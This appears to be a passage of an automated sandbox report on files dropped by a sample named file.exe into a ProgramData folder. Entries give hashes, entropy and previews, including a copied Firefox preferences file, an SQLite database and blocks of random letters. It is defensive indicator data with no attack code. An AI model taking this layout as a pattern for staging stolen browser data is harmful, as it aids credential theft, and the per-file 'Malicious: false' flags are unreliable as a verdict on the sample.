Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\BGHJEB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1765), with CRLF line terminators
Category:	dropped
Size (bytes):	9976
Entropy (8bit):	5.499944288613473
Encrypted:	false
SSDEEP:	192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
MD5:	42594FD09C4DF3B174CF5D59B1CAB13A
SHA1:	1B78FEB748C36A592C468A76BB60E98187D7BE4A
SHA-256:	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
SHA-512:	E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\AFIDGDBGCAAF\CAEBGH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\ProgramData\AFIDGDBGCAAF\CBAFID

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\CFCGII

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6980379859154695
Encrypted:	false
SSDEEP:	24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
MD5:	4E3F4BE1B97FA984F75F11D95B1C2602
SHA1:	C34EB2BF97AB4B0032A4BB92B9579B00514DC211
SHA-256:	59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
SHA-512:	DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
Malicious:	false
Preview:	QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA

C:\ProgramData\AFIDGDBGCAAF\CFHDBF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\ProgramData\AFIDGDBGCAAF\CGHCFB

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\DAAAKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\DAEBKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\DAEHJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBGCAAF\DBKKKE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\ProgramData\AFIDGDBGCAAF\EBFBKK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702263764575455
Encrypted:	false
SSDEEP:	24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
MD5:	1680F18135FD9FE517865D4B70BCA69F
SHA1:	CE72CFB81AB690709C2C5BBF40348F829C87813B
SHA-256:	0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
SHA-512:	E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
Malicious:	false
Preview:	ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

C:\ProgramData\AFIDGDBGCAAF\EBFHJE

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.685942106278079
Encrypted:	false
